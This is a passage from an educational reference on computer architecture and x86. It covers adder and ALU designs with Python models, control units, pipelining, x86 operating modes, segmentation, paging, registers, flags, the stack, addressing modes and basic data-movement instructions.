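print(ripple_carry_add(0b1011, 0b0110))   # (1, 1): 11 + 6 = 17 = 1_0001
```

Each stage must wait for the carry from the stage below it, which is why the delay of this design grows linearly with the word width.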
Carry Look-Ahead Adder
Faster than ripple-carry by precomputing carries:
- Generate: Gi = Ai AND Bi
- Propagate: Pi = Ai XOR Bi
- Carry: Ci+1 = Gi OR (Pi AND Ci)
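Unrolling the recurrence Ci+1 = Gi OR (Pi AND Ci) expresses every carry directly in terms of the generate and propagate signals and C0, so no carry has to wait for another. The Python sketch below evaluates those unrolled equations; it models the logic, not the gate-level timing, and its names are assumptions.

```python
def cla_add(a, b, bits=4, c0=0):
    """Add two unsigned values using unrolled carry look-ahead equations."""
    g = [(a >> i) & (b >> i) & 1 for i in range(bits)]     # Gi = Ai AND Bi
    p = [((a >> i) ^ (b >> i)) & 1 for i in range(bits)]   # Pi = Ai XOR Bi

    def carry_into(i):
        # Ci = G(i-1) + P(i-1)G(i-2) + ... + P(i-1)...P1 G0 + P(i-1)...P0 C0
        term = c0
        for k in range(i):
            term &= p[k]
        carry = term
        for j in range(i):
            term = g[j]
            for k in range(j + 1, i):
                term &= p[k]
            carry |= term
        return carry

    total = 0
    for i in range(bits):
        total |= (p[i] ^ carry_into(i)) << i    # Si = Pi XOR Ci
    return total, carry_into(bits)

print(cla_add(0b1011, 0b0110))   # (1, 1), same result as a ripple-carry adder
```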
Arithmetic Logic Unit (ALU)
ALU combines multiple operations with selection:
Control lines select function:
000: A AND B
001: A OR B
010: A + B
011: A - B
100: SLT (set if less than)
...
Block diagram:
A[31:0] ───┐
B[31:0] ───┼──► ALU ──► Result[31:0]
Control ───┘     └────► Flags (Zero, Carry, Overflow, Negative)
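A behavioral Python sketch of such an ALU follows, using the five control codes listed above. It is an illustration under stated assumptions: the carry flag reported for subtraction is the raw carry-out of the adder (architectures differ on whether they expose this or its inverse as a borrow), and SLT is treated as a signed comparison.

```python
MASK32 = 0xFFFFFFFF

def to_signed(x):
    """Interpret a 32-bit pattern as a signed value."""
    return x - (1 << 32) if x & 0x80000000 else x

def alu(control, a, b):
    """Return (result, flags) for a 32-bit ALU operation."""
    a &= MASK32
    b &= MASK32
    carry = overflow = 0
    if control == 0b000:
        result = a & b
    elif control == 0b001:
        result = a | b
    elif control == 0b010:                       # A + B
        full = a + b
        result = full & MASK32
        carry = full >> 32
        overflow = ((a ^ result) & (b ^ result)) >> 31 & 1
    elif control == 0b011:                       # A - B computed as A + ~B + 1
        full = a + (~b & MASK32) + 1
        result = full & MASK32
        carry = full >> 32                       # raw adder carry-out
        overflow = ((a ^ b) & (a ^ result)) >> 31 & 1
    elif control == 0b100:                       # SLT (signed)
        result = 1 if to_signed(a) < to_signed(b) else 0
    else:
        raise ValueError("unsupported control code")
    flags = {"zero": int(result == 0), "carry": carry,
             "overflow": overflow, "negative": result >> 31}
    return result, flags

print(alu(0b010, 0x7FFFFFFF, 1))   # signed overflow: result 0x80000000
```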
Control units generate the signals that coordinate CPU operations.
Hardwired Control
Logic gates generate control signals based on instruction:
- Fast but complex for large instruction sets
- Used in RISC processors
- Difficult to modify
Microprogrammed Control
Control signals stored in control store (ROM):
- Each instruction triggers microcode routine
- Easier to modify (microcode updates)
- Used in CISC processors
- Slower than hardwired
Microinstruction Format:
| Next Address | Control Signals | ALU Control | ... |
Microinstructions execute in sequence to implement machine instructions:
ADD instruction microcode:
1: MAR ← PC, Read memory, PC ← PC+1
2: IR ← Memory
3: Decode IR
4: A ← Register[IR.Rs]
5: B ← Register[IR.Rt]
6: ALU ← A + B
7: Register[IR.Rd] ← ALU
8: Fetch next instruction
The fundamental operation of a CPU is the fetch-decode-execute cycle.
Fetch Phase
- Program Counter (PC) contains address of next instruction
- Address placed on address bus
- Control signals request memory read
- Instruction word returned on data bus
- Instruction loaded into Instruction Register (IR)
- PC incremented to next instruction
Decode Phase
- Instruction Register contents decoded
- Control unit identifies operation and operands
- Register file addresses extracted
- Immediate values sign-extended
- Control signals prepared for execute phase
Execute Phase
- ALU performs required operation
- Memory read/write performed
- Register file updated
- Flags updated (Zero, Carry, etc.)
- PC modified for branches/jumps
Pipeline Stages
Modern CPUs pipeline this cycle:
| Cycle | Stage 1 | Stage 2 | Stage 3 | Stage 4 | Stage 5 |
|---|---|---|---|---|---|
| 1 | Fetch 1 | | | | |
| 2 | Fetch 2 | Decode 1 | | | |
| 3 | Fetch 3 | Decode 2 | Exec 1 | | |
| 4 | Fetch 4 | Decode 3 | Exec 2 | Mem 1 | |
| 5 | Fetch 5 | Decode 4 | Exec 3 | Mem 2 | Write 1 |
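
The table follows a simple rule: in cycle c, stage s (counting from 0) holds instruction c - s. The Python sketch below generates the full schedule for an ideal pipeline with no stalls; the stage names are taken from the table, and the function name is an assumption.

```python
STAGES = ["Fetch", "Decode", "Exec", "Mem", "Write"]

def pipeline_schedule(instructions, stages=STAGES):
    """Rows of stage occupancy per cycle for an ideal, stall-free pipeline."""
    total_cycles = len(stages) + instructions - 1
    rows = []
    for cycle in range(1, total_cycles + 1):
        row = []
        for s, name in enumerate(stages):
            instr = cycle - s                    # instruction in stage s this cycle
            row.append(f"{name} {instr}" if 1 <= instr <= instructions else "")
        rows.append(row)
    return rows

schedule = pipeline_schedule(5)
print(len(schedule))   # 9 cycles for 5 instructions, versus 25 unpipelined
print(schedule[4])     # ['Fetch 5', 'Decode 4', 'Exec 3', 'Mem 2', 'Write 1']
```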
Pipeline Hazards
- Structural hazards: Resource conflicts
- Data hazards: Instruction depends on previous result
- Control hazards: Branches change flow
Solutions: stalling, forwarding, branch prediction, speculation
The x86 architecture's 40+ year history demonstrates remarkable backward compatibility while adding modern features.
8086 (1978)
- 16-bit architecture
- 20-bit address bus (1MB addressable)
- 14 registers: AX, BX, CX, DX, SI, DI, BP, SP, CS, DS, SS, ES, IP, FLAGS
- Segment:offset addressing
- No protection, no virtual memory
- Maximum 1MB RAM
8088 (1979)
- Same architecture as 8086
- 8-bit external data bus (cheaper implementation)
- Used in original IBM PC
80286 (1982)
- 16-bit, 24-bit address (16MB)
- Protected mode introduced
- Memory protection through segmentation, but no paging
- Backward compatible with real mode
80386 (1985)
- 32-bit architecture
- 32-bit registers (EAX, EBX, etc.)
- 32-bit address bus (4GB)
- Paging, virtual memory
- Protected mode enhancements
- Virtual 8086 mode
- Flat memory model possible
80486 (1989)
- Integrated FPU (except 486SX)
- 8KB L1 cache on-chip
- Pipeline improvements
- Faster instructions
Pentium (1993)
- Superscalar (2 instructions per cycle)
- 64-bit data bus
- MMX instructions (1997)
- Better FPU
Pentium Pro (1995)
- Out-of-order execution
- Conditional move instructions
- On-package L2 cache
Pentium II (1997)
- MMX, out-of-order
- Slot 1 cartridge
Pentium III (1999)
- SSE (70 new instructions)
- Streaming SIMD extensions
Pentium 4 (2000)
- NetBurst architecture
- Very deep pipeline
- SSE2, SSE3
- Hyper-Threading (2002)
Core Architecture (2006)
- Return to efficient pipeline
- 64-bit (EM64T)
- Multi-core
- Virtualization (VT-x)
Core i Series (2008+)
- Integrated memory controller
- Integrated graphics
- Turbo Boost
- AES-NI, AVX, AVX2
- Ring bus architecture
Modern x86-64
- 64-bit addressing (theoretically 16EB, practically less)
- 16 general-purpose registers (RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, R8-R15)
- RIP-relative addressing
- No segmentation in 64-bit mode
- Some legacy features unavailable in long mode (e.g., virtual 8086 mode, hardware task switching)
Real Mode
- 16-bit mode from 8086
- 1MB address space (20-bit)
- Segmented addressing: physical = segment×16 + offset
- No protection between programs
- Direct hardware access
- Operating system can crash from any program
- Used by bootloaders, BIOS
Real mode addressing example:
mov ax, 0x1000 ; segment
mov ds, ax
mov bx, 0x2000 ; offset
mov al, [bx] ; accesses physical 0x1000×16 + 0x2000 = 0x12000
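The address calculation is plain arithmetic and can be checked in Python. The sketch assumes the 8086's 20-bit address bus, so results wrap at 1MB; the function name is hypothetical.

```python
def real_mode_physical(segment, offset):
    """physical = segment * 16 + offset, truncated to 20 address bits."""
    linear = ((segment & 0xFFFF) << 4) + (offset & 0xFFFF)
    return linear & 0xFFFFF

print(hex(real_mode_physical(0x1000, 0x2000)))   # 0x12000
print(hex(real_mode_physical(0x1200, 0x0000)))   # 0x12000 (same byte, different pair)
print(hex(real_mode_physical(0xFFFF, 0x0010)))   # 0x0 (wraps past 1MB)
```

The second line shows that many segment:offset pairs alias the same physical address, a common source of confusion in real-mode code.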
Protected Mode
- Introduced with 286, matured with 386
- 32-bit addressing (4GB)
- Memory protection through segmentation and paging
- Privilege levels (rings)
- Virtual memory
- Multitasking support
- Protected from errant programs
Virtual 8086 Mode
- Run real-mode programs within protected mode
- Each VM86 task has 1MB virtual space
- Traps sensitive instructions
- Used by Windows 9x for DOS programs
Long mode is the operating mode introduced by x86-64; it comprises full 64-bit execution and a compatibility sub-mode.
Sub-modes
- 64-bit mode: True 64-bit execution
- Compatibility mode: Run 16/32-bit apps under 64-bit OS
Features
- 64-bit virtual addresses (48/57 bits actually used)
- 64-bit general purpose registers
- 8 new registers (R8-R15)
- 16 XMM registers (vs 8 in 32-bit)
- RIP-relative addressing
- No segmentation (except FS/GS for thread-local storage)
- Flat memory model
Addressing Limitations
- Current CPUs use 48-bit virtual addresses (256TB)
- 4-level paging (48 bits) or 5-level paging (57 bits)
- Canonical addresses: bits 63:48 must be sign-extended from bit 47
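The canonical-address rule can be expressed as a check that all bits from the top implemented bit upward are identical. A Python sketch, with the function name and the `virtual_bits` parameter as assumptions (48 for 4-level paging, 57 for 5-level):

```python
def is_canonical(address, virtual_bits=48):
    """True if bits 63..(virtual_bits-1) of a 64-bit address are all equal."""
    if not 0 <= address < 1 << 64:
        raise ValueError("expects a 64-bit unsigned address")
    upper = address >> (virtual_bits - 1)              # bits 63 down to 47 for 48-bit
    all_ones = (1 << (64 - virtual_bits + 1)) - 1
    return upper == 0 or upper == all_ones

print(is_canonical(0x00007FFFFFFFFFFF))   # True: top of the lower half
print(is_canonical(0xFFFF800000000000))   # True: bottom of the upper half
print(is_canonical(0x0000800000000000))   # False: bit 47 set but bits 63:48 clear
```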
x86 provides four privilege levels (0-3) called rings:
Ring 0: Kernel (most privileged)
Ring 1: Device drivers (rarely used)
Ring 2: Device drivers (rarely used)
Ring 3: Applications (least privileged)
Ring Transitions
- Calls: SYSENTER/SYSEXIT, SYSCALL/SYSRET
- Interrupts: Hardware interrupts, software interrupts (INT n)
- Exceptions: Page faults, divide errors, etc.
What Each Ring Can Do
Ring 0 can:
- Execute privileged instructions (LGDT, MOV to CR0, etc.)
- Access all memory
- Disable interrupts
- Modify page tables
Ring 3 cannot:
- Execute privileged instructions (cause #GP fault)
- Access kernel memory (unless mapped with user access)
- Halt the CPU
Segmentation divides memory into variable-sized segments.
Segment Selectors
16-bit value in segment register:
Bits 15-3: Index into descriptor table
Bit 2: Table Indicator (0=GDT, 1=LDT)
Bits 1-0: Requested Privilege Level (RPL)
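Decoding a selector is a matter of shifting and masking the three fields. A Python sketch (the function name and dictionary keys are assumptions); the sample values are arbitrary selectors chosen for illustration.

```python
def decode_selector(selector):
    """Split a 16-bit segment selector into index, table indicator, and RPL."""
    return {
        "index": (selector >> 3) & 0x1FFF,             # bits 15-3
        "table": "LDT" if selector & 0b100 else "GDT",  # bit 2
        "rpl": selector & 0b11,                        # bits 1-0
    }

print(decode_selector(0x08))   # {'index': 1, 'table': 'GDT', 'rpl': 0}
print(decode_selector(0x2B))   # {'index': 5, 'table': 'GDT', 'rpl': 3}
```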
Descriptor Tables
- GDT (Global Descriptor Table): Shared by all tasks
- LDT (Local Descriptor Table): Per-task segments
- IDT (Interrupt Descriptor Table): Interrupt handlers
Segment Descriptor (8 bytes):
Byte 0-1: Segment Limit (15:0)
Byte 2-4: Base Address (23:0)
Byte 5: Access Rights
  Bit 7: Present
  Bits 6-5: Privilege Level (0-3)
  Bit 4: Descriptor Type (1=code/data, 0=system)
  Bit 3: Executable (1=code, 0=data)
  For code: Bit 2: Conforming, Bit 1: Readable
  For data: Bit 2: Direction, Bit 1: Writable
  Bit 0: Accessed
Byte 6: Flags + Limit (19:16)
  Bits 7-4: Flags (G=granularity, D/B=default size, L=long mode, AVL=available)
  Bits 3-0: Limit (19:16)
Byte 7: Base Address (31:24)
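Because the base and limit are scattered across the descriptor, packing one by hand is error-prone. The Python sketch below assembles the 8 bytes assuming the standard layout: limit 15:0 in bytes 0-1, base 23:0 in bytes 2-4, the access byte in byte 5, flags plus limit 19:16 in byte 6, and base 31:24 in byte 7. The function name is hypothetical.

```python
import struct

def make_descriptor(base, limit, access, flags):
    """Pack a legacy 8-byte segment descriptor (little-endian in memory)."""
    return struct.pack(
        "<HHBBBB",
        limit & 0xFFFF,                                 # bytes 0-1: limit 15:0
        base & 0xFFFF,                                  # bytes 2-3: base 15:0
        (base >> 16) & 0xFF,                            # byte 4:    base 23:16
        access & 0xFF,                                  # byte 5:    access rights
        ((flags & 0xF) << 4) | ((limit >> 16) & 0xF),   # byte 6:    flags + limit 19:16
        (base >> 24) & 0xFF,                            # byte 7:    base 31:24
    )

# Flat 4GB ring-0 code segment: present, code, readable; G=1 and D=1.
code = make_descriptor(base=0, limit=0xFFFFF, access=0x9A, flags=0xC)
print(code.hex(" "))                              # ff ff 00 00 00 9a cf 00
print(hex(int.from_bytes(code, "little")))        # 0xcf9a000000ffff
```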
Address Translation
Logical address (segment:offset) → Linear address → (optional paging) → Physical
Paging provides virtual memory, protection, and isolation.
Page Tables
Modern x86 uses 4-level (or 5-level) page tables:
CR3 → PML4   → PDPT   → PD     → PT     → 4KB Page
      9 bits   9 bits   9 bits   9 bits   12 bits offset
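With 4-level paging and 4KB pages, a 48-bit virtual address splits into four 9-bit table indices and a 12-bit page offset. A Python sketch of that split (function name and dictionary keys are assumptions):

```python
def split_virtual_address(va):
    """Return the four table indices and page offset of a 48-bit virtual address."""
    return {
        "pml4":   (va >> 39) & 0x1FF,   # bits 47-39
        "pdpt":   (va >> 30) & 0x1FF,   # bits 38-30
        "pd":     (va >> 21) & 0x1FF,   # bits 29-21
        "pt":     (va >> 12) & 0x1FF,   # bits 20-12
        "offset": va & 0xFFF,           # bits 11-0
    }

print(split_virtual_address(0xFFFF800000000000))
# {'pml4': 256, 'pdpt': 0, 'pd': 0, 'pt': 0, 'offset': 0}
```

The example shows why kernels that live in the upper canonical half start at PML4 entry 256: that is the first entry whose addresses have bit 47 set.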
Page Table Entry (64-bit)
Bit 0: Present
Bit 1: Read/Write
Bit 2: User/Supervisor
Bit 3: Page-level Write-Through
Bit 4: Page-level Cache Disable
Bit 5: Accessed
Bit 6: Dirty
Bit 7: Page Size (1 for 2MB/1GB pages)
Bit 8: Global
Bits 9-11: Available
Bits 12-51: Physical Address (page-aligned)
Bits 52-62: Available
Bit 63: Execute Disable (NX bit)
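A page table entry can be decoded by masking out the physical address field and testing the individual flag bits listed above. The flag names in this Python sketch are informal labels chosen for the example, not official mnemonics.

```python
PTE_FLAGS = {
    0: "present", 1: "writable", 2: "user", 3: "write_through",
    4: "cache_disable", 5: "accessed", 6: "dirty", 7: "page_size",
    8: "global", 63: "no_execute",
}
PHYS_MASK = 0x000FFFFFFFFFF000   # bits 12-51

def decode_pte(entry):
    """Return (physical address, set of flag names) for a 64-bit entry."""
    flags = {name for bit, name in PTE_FLAGS.items() if (entry >> bit) & 1}
    return entry & PHYS_MASK, flags

address, flags = decode_pte(0x8000000000123007)
print(hex(address), sorted(flags))
# 0x123000 ['no_execute', 'present', 'user', 'writable']
```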
Large Pages
- 2MB pages (PDE with PS=1)
- 1GB pages (PDPTE with PS=1)
TLB (Translation Lookaside Buffer)
Caches recent page translations:
- Small (tens to hundreds of entries)
- Very fast (accessed in parallel)
- Needs invalidation on page table changes
Paging Benefits
- Isolated address spaces
- Demand paging (pages loaded on fault)
- Shared memory (same physical page mapped multiple times)
- Copy-on-write
- Memory overcommitment
x86-64 provides 16 general-purpose registers, each 64 bits wide.
Legacy 32-bit Names
64-bit | 32-bit | 16-bit | 8-bit (low) | 8-bit (high)
-------|--------|--------|-------------|------------
RAX | EAX | AX | AL | AH
RBX | EBX | BX | BL | BH
RCX | ECX | CX | CL | CH
RDX | EDX | DX | DL | DH
RSI | ESI | SI | SIL | -
RDI | EDI | DI | DIL | -
RBP | EBP | BP | BPL | -
RSP | ESP | SP | SPL | -
R8 | R8D | R8W | R8B | -
R9 | R9D | R9W | R9B | -
R10 | R10D | R10W | R10B | -
R11 | R11D | R11W | R11B | -
R12 | R12D | R12W | R12B | -
R13 | R13D | R13W | R13B | -
R14 | R14D | R14W | R14B | -
R15 | R15D | R15W | R15B | -
Register Purposes (Conventional)
- RAX: Accumulator, return value, syscall number
- RBX: Base register (callee-saved)
- RCX: Counter (loop, shift/rotate count)
- RDX: Data register (extended accumulator, I/O)
- RSI: Source index (string operations)
- RDI: Destination index (string operations)
- RBP: Base pointer (frame pointer, callee-saved)
- RSP: Stack pointer
- R8-R15: General purpose (some syscall args in System V)
Segment Registers in 64-bit Mode
Most segmentation is disabled, but FS and GS remain:
- CS: Code segment (not used directly)
- DS: Data segment (ignored, treated as 0)
- SS: Stack segment (ignored, treated as 0)
- ES: Extra segment (ignored, treated as 0)
- FS: Used for thread-local storage on 64-bit Linux (thread control block)
- GS: Used for the TEB on 64-bit Windows and for per-CPU data in the Linux kernel
FS/GS Base Address
In 64-bit mode, FS and GS have hidden base addresses set via MSRs:
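; Set FS base to the value in RCX (WRMSR is privileged: ring 0 only)
mov rax, rcx ; EAX = low 32 bits of the new base
mov rdx, rcx
shr rdx, 32 ; EDX = high 32 bits of the new base
mov ecx, 0xC0000100 ; MSR_FS_BASE
wrmsr ; write EDX:EAX to the MSR selected by ECX
Control registers (CR0-CR4, CR8) control processor features.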
CR0 (System Control Flags)
Bit 0: PE - Protected Mode Enable
Bit 1: MP - Monitor Coprocessor
Bit 2: EM - Emulate Coprocessor
Bit 3: TS - Task Switched
Bit 4: ET - Extension Type (80386 only)
Bit 5: NE - Numeric Error
Bit 16: WP - Write Protect (supervisor write protection)
Bit 18: AM - Alignment Mask
Bit 29: NW - Not Write-through
Bit 30: CD - Cache Disable
Bit 31: PG - Paging Enable
CR1: Reserved
CR2: Page Fault Linear Address (address that caused fault)
CR3: Page Directory Base Register (physical address of top-level page table)
CR4 (Extended Features)
Bit 0: VME - Virtual-8086 Mode Extensions
Bit 1: PVI - Protected-Mode Virtual Interrupts
Bit 2: TSD - Time Stamp Disable (RDTSC privilege)
Bit 3: DE - Debugging Extensions
Bit 4: PSE - Page Size Extensions
Bit 5: PAE - Physical Address Extensions
Bit 6: MCE - Machine Check Enable
Bit 7: PGE - Page Global Enable
Bit 8: PCE - Performance-Monitoring Counter Enable
Bit 9: OSFXSR - OS Supports FXSAVE/FXRSTOR
Bit 10: OSXMMEXCPT - OS Supports SIMD Exceptions
Bit 11: UMIP - User-Mode Instruction Prevention
Bit 12: LA57 - 57-bit Linear Addresses (5-level paging)
Bit 13: VMXE - VMX Enable
Bit 14: SMXE - SMX Enable
Bit 16: FSGSBASE - Enable RDFSBASE/WRFSBASE instructions
Bit 17: PCIDE - Process-Context Identifiers
Bit 18: OSXSAVE - OS Supports XSAVE/XRSTOR
Bit 20: SMEP - Supervisor Mode Execution Protection
Bit 21: SMAP - Supervisor Mode Access Prevention
CR8: Task Priority Register (for interrupt masking)
EFER (Extended Feature Enable Register, MSR)
Bit 0: SCE - System Call Extensions (SYSCALL/SYSRET)
Bit 8: LME - Long Mode Enable
Bit 10: LMA - Long Mode Active
Bit 11: NXE - No-Execute Enable
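The bit positions listed above combine when entering long mode: software sets CR4.PAE and EFER.LME, then enables paging with CR0.PG, after which the processor sets EFER.LMA. A minimal sketch of that check in C follows. The function names are hypothetical, and the register values are assumed to have been read elsewhere, since reading them requires ring 0.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR0_PG   (1u << 31)  /* CR0 bit 31: paging enable */
#define CR4_PAE  (1u << 5)   /* CR4 bit 5: physical address extensions */
#define EFER_LME (1u << 8)   /* EFER bit 8: long mode enable */
#define EFER_LMA (1u << 10)  /* EFER bit 10: long mode active (set by the CPU) */

/* Hypothetical helper: true if PG, PAE and LME are all set, i.e. software
   has done its part to enable long mode. */
static bool long_mode_requested(uint64_t cr0, uint64_t cr4, uint64_t efer)
{
    return (cr0 & CR0_PG) && (cr4 & CR4_PAE) && (efer & EFER_LME);
}

/* Hypothetical helper: true if the processor reports long mode as active. */
static bool long_mode_active(uint64_t efer)
{
    return (efer & EFER_LMA) != 0;
}
```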
DR0-DR7 support hardware breakpoints.
DR0-DR3: Linear breakpoint addresses
DR6: Debug status (which breakpoint triggered)
Bit 0: B0 - Breakpoint 0 condition
Bit 1: B1 - Breakpoint 1 condition
Bit 2: B2 - Breakpoint 2 condition
Bit 3: B3 - Breakpoint 3 condition
Bit 13: BD - Debug register access detected
Bit 14: BS - Single step
Bit 15: BT - Task switch
DR7: Debug control
Bits 0-1: L0,G0 - Local/Global enable for breakpoint 0
Bits 2-3: L1,G1 - Breakpoint 1
Bits 4-5: L2,G2 - Breakpoint 2
Bits 6-7: L3,G3 - Breakpoint 3
Bits 8-9: LE,GE - Exact breakpoint enable (deprecated)
Bits 16-31: R/W0-3, LEN0-3 (type and length for each breakpoint)
Breakpoint Types (R/W field):
- 00: Instruction execution
- 01: Data writes
- 10: I/O reads/writes (requires CR4.DE)
- 11: Data reads/writes
Breakpoint Length (LEN field):
- 00: 1 byte
- 01: 2 bytes
- 10: 8 bytes (or reserved)
- 11: 4 bytes
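The DR7 layout above can be sketched as a small C helper that assembles the enable bit, R/W field and LEN field for one breakpoint. The name `dr7_local_enable` and the enum constants are made up for this illustration. Actually loading the value into DR7 needs a privileged `mov dr7, ...` and is not shown.

```c
#include <stdint.h>

/* R/W field encodings (breakpoint type) */
enum { BP_EXEC = 0, BP_WRITE = 1, BP_IO = 2, BP_RW = 3 };
/* LEN field encodings */
enum { BP_LEN1 = 0, BP_LEN2 = 1, BP_LEN8 = 2, BP_LEN4 = 3 };

/* Hypothetical helper: DR7 bits that locally enable breakpoint n (0-3)
   with the given type and length encodings. */
static uint32_t dr7_local_enable(unsigned n, unsigned rw, unsigned len)
{
    uint32_t v = 0;
    v |= 1u << (n * 2);                          /* L<n> enable bit */
    v |= (uint32_t)(rw & 3u) << (16 + n * 4);    /* R/W<n> field */
    v |= (uint32_t)(len & 3u) << (18 + n * 4);   /* LEN<n> field */
    return v;
}
```

For example, a 4-byte write watchpoint in slot 0 is `dr7_local_enable(0, BP_WRITE, BP_LEN4)`, which evaluates to 0x000D0001.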
The flags register stores status and control bits.
Status Flags (updated by arithmetic)
Bit 0: CF - Carry Flag (unsigned overflow)
Bit 2: PF - Parity Flag (even parity of low byte)
Bit 4: AF - Auxiliary Carry (BCD operations)
Bit 6: ZF - Zero Flag (result zero)
Bit 7: SF - Sign Flag (negative result)
Bit 11: OF - Overflow Flag (signed overflow)
Control Flags
Bit 8: TF - Trap Flag (single-step for debugging)
Bit 9: IF - Interrupt Enable Flag
Bit 10: DF - Direction Flag (0=up, 1=down for string ops)
Bit 12-13: IOPL - I/O Privilege Level
Bit 14: NT - Nested Task
System Flags
Bit 16: RF - Resume Flag (debugging)
Bit 17: VM - Virtual-8086 Mode
Bit 18: AC - Alignment Check
Bit 19: VIF - Virtual Interrupt Flag
Bit 20: VIP - Virtual Interrupt Pending
Bit 21: ID - ID Flag (CPUID support)
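To make the status flags concrete, the sketch below computes what an 8-bit ADD would leave in CF, PF, AF, ZF, SF and OF. It is a model written for illustration, not processor code, and the names `flags8` and `add8_flags` are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct flags8 { bool cf, pf, af, zf, sf, of; };

/* Hypothetical helper: flags produced by an 8-bit ADD of a and b.
   The 8-bit result is stored through `result` when it is not NULL. */
static struct flags8 add8_flags(uint8_t a, uint8_t b, uint8_t *result)
{
    unsigned wide = (unsigned)a + (unsigned)b;
    uint8_t r = (uint8_t)wide;
    struct flags8 f;

    f.cf = wide > 0xFF;                        /* carry out of bit 7 */
    f.af = ((a & 0x0F) + (b & 0x0F)) > 0x0F;   /* carry out of bit 3 */
    f.zf = (r == 0);
    f.sf = (r & 0x80) != 0;
    f.of = ((a ^ r) & (b ^ r) & 0x80) != 0;    /* operands share a sign, result differs */

    /* PF is set when the low byte holds an even number of 1 bits */
    unsigned ones = 0;
    for (unsigned bit = 0; bit < 8; bit++)
        ones += (r >> bit) & 1u;
    f.pf = (ones % 2) == 0;

    if (result != NULL)
        *result = r;
    return f;
}
```

Adding 0x7F and 0x01 sets OF and SF but not CF (signed overflow), while adding 0xFF and 0x01 sets CF and ZF but not OF (unsigned overflow).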
Common Flag Operations
; Clear carry
clc
; Set carry
stc
; Complement carry
cmc
; Clear direction (string ops increment)
cld
; Set direction (string ops decrement)
std
; Clear interrupt flag
cli
; Set interrupt flag
sti
; Push flags onto stack
pushfq
; Pop flags from stack
popfq
; Load low byte of flags (SF, ZF, AF, PF, CF) into AH
lahf
; Store AH into the low byte of flags
sahf
The stack is a Last-In-First-Out (LIFO) data structure.
Stack Operations
; Push: decrement RSP, store value
push rax ; RSP -= 8, [RSP] = RAX
; Pop: load value, increment RSP
pop rax ; RAX = [RSP], RSP += 8
; Call: push return address, jump
call func ; push RIP (next instruction), jmp func
; Return: pop return address, jump
ret ; pop RIP, jmp
Stack Frame Layout
Typical function prologue:
push rbp ; save caller's frame pointer
mov rbp, rsp ; set our frame pointer
sub rsp, 32 ; allocate local variables
Stack layout:
High addresses
+-----------------+
| Caller's frame |
+-----------------+ <--- RBP+16 (first arg)
| Return address |
+-----------------+ <--- RBP+8
| Saved RBP |
+-----------------+ <--- RBP
| Local variables |
+-----------------+ <--- RBP-x
| (alignment) |
+-----------------+ <--- RSP
Low addresses
Stack Alignment
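The x86-64 ABI requires 16-byte stack alignment at each call:
- RSP must be a multiple of 16 immediately before the call instruction
- call pushes an 8-byte return address (misaligning RSP by 8)
- The function prologue re-aligns (push rbp restores 16-byte alignment)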
x86 provides flexible addressing modes.
Immediate (constant in instruction)
mov rax, 42 ; 42 is immediate
Register (value in register)
mov rax, rbx ; content of RBX
Direct (address constant)
mov rax, [0x1234] ; load from absolute address
Register Indirect
mov rax, [rbx] ; address in RBX
Base + Displacement
mov rax, [rbx + 16] ; RBX + 16
mov rax, [array + 8] ; constant + 8
Indexed
mov rax, [rbx + rcx*8] ; RBX + RCX*8
Base + Index + Displacement
mov rax, [rbx + rcx*4 + 16] ; most complex form
RIP-Relative (64-bit only)
mov rax, [rip + offset] ; relative to the address of the next instruction
Addressing Mode Encodings
MODRM byte structure:
7 6 5 4 3 2 1 0
+-----+-----+-----+
| Mod | Reg | R/M |
+-----+-----+-----+
SIB byte (Scale-Index-Base):
7 6 5 4 3 2 1 0
+-----+-----+-----+
|Scale|Index|Base |
+-----+-----+-----+
Scale: 00=1, 01=2, 10=4, 11=8
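The field layout above can be decoded with a few shifts and masks. The sketch below is illustrative only: the struct and function names are invented, and it ignores the REX prefix bits that extend the reg, index and base fields to four bits in 64-bit mode.

```c
#include <stdint.h>

struct modrm { uint8_t mod, reg, rm; };
struct sib   { uint8_t scale, index, base; };  /* scale holds the multiplier: 1, 2, 4 or 8 */

/* Split a ModRM byte into its Mod (bits 7-6), Reg (5-3) and R/M (2-0) fields. */
static struct modrm decode_modrm(uint8_t byte)
{
    struct modrm m = { (uint8_t)(byte >> 6), (uint8_t)((byte >> 3) & 7), (uint8_t)(byte & 7) };
    return m;
}

/* Split a SIB byte; the 2-bit scale field is converted to its multiplier. */
static struct sib decode_sib(uint8_t byte)
{
    struct sib s = { (uint8_t)(1u << (byte >> 6)), (uint8_t)((byte >> 3) & 7), (uint8_t)(byte & 7) };
    return s;
}

/* Effective address for the base + index*scale + displacement form. */
static uint64_t effective_address(uint64_t base, uint64_t index, uint8_t scale, int32_t disp)
{
    return base + index * scale + (uint64_t)(int64_t)disp;
}
```

As a check, the SIB byte 0x8B decodes to scale 4, index 1 (RCX) and base 3 (RBX), which is the `[rbx + rcx*4]` form shown earlier.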
MOV (Move)
Most common instruction, copies data between registers/memory.
mov rax, rbx ; register to register
mov rax, [mem] ; memory to register
mov [mem], rax ; register to memory
mov rax, 1234 ; immediate to register
mov dword [mem], 1234 ; immediate to memory (size specifier required)
Size specifiers (NASM):
mov byte [mem], 12 ; 8-bit
mov word [mem], 1234 ; 16-bit
mov dword [mem], 1234 ; 32-bit
mov qword [mem], 1234 ; 64-bit (immediate is a sign-extended 32-bit value)
MOVZX (Move with Zero-Extend)
movzx eax, bl ; zero-extend BL to EAX
movzx rax, bx ; zero-extend BX to RAX
MOVSX (Move with Sign-Extend)
movsx eax, bl ; sign-extend BL to EAX
movsx rax, bx ; sign-extend BX to RAX
movsxd rax, ebx ; sign-extend 32-bit to 64-bit (separate mnemonic)
XCHG (Exchange)
xchg rax, rbx ; swap RAX and RBX
xchg [mem], rax ; atomic exchange with memory (implicit LOCK)
PUSH/POP (Stack operations)
push rax ; push RAX onto stack
push 1234 ; push immediate (sign-extended to 64 bits)
push word 1234 ; push 16-bit immediate
pop rax ; pop into RAX
pop qword [mem] ; pop into memory
LEA (Load Effective Address)
Computes address but doesn't access memory.
lea rax, [rbx+rcx*4] ; RAX = RBX + RCX*4
lea rax, [rel array] ; RAX = address of array (RIP-relative)
Common trick: LEA for arithmetic:
lea eax, [ebx+ecx] ; EAX = EBX + ECX (without setting flags)
lea eax, [ebx*4+ebx] ; EAX = EBX*5
CMOV (Conditional Move)
cmp eax, ebx
cmovg ecx, edx ; if EAX > EBX (signed), ECX = EDX
MOVBE (Move with Byte Swap)
movbe eax, [mem] ; load with byte swap (endianness conversion)
Addition
add rax, rbx ; RAX = RAX + RBX
add rax, 1234 ; RAX = RAX + 1234
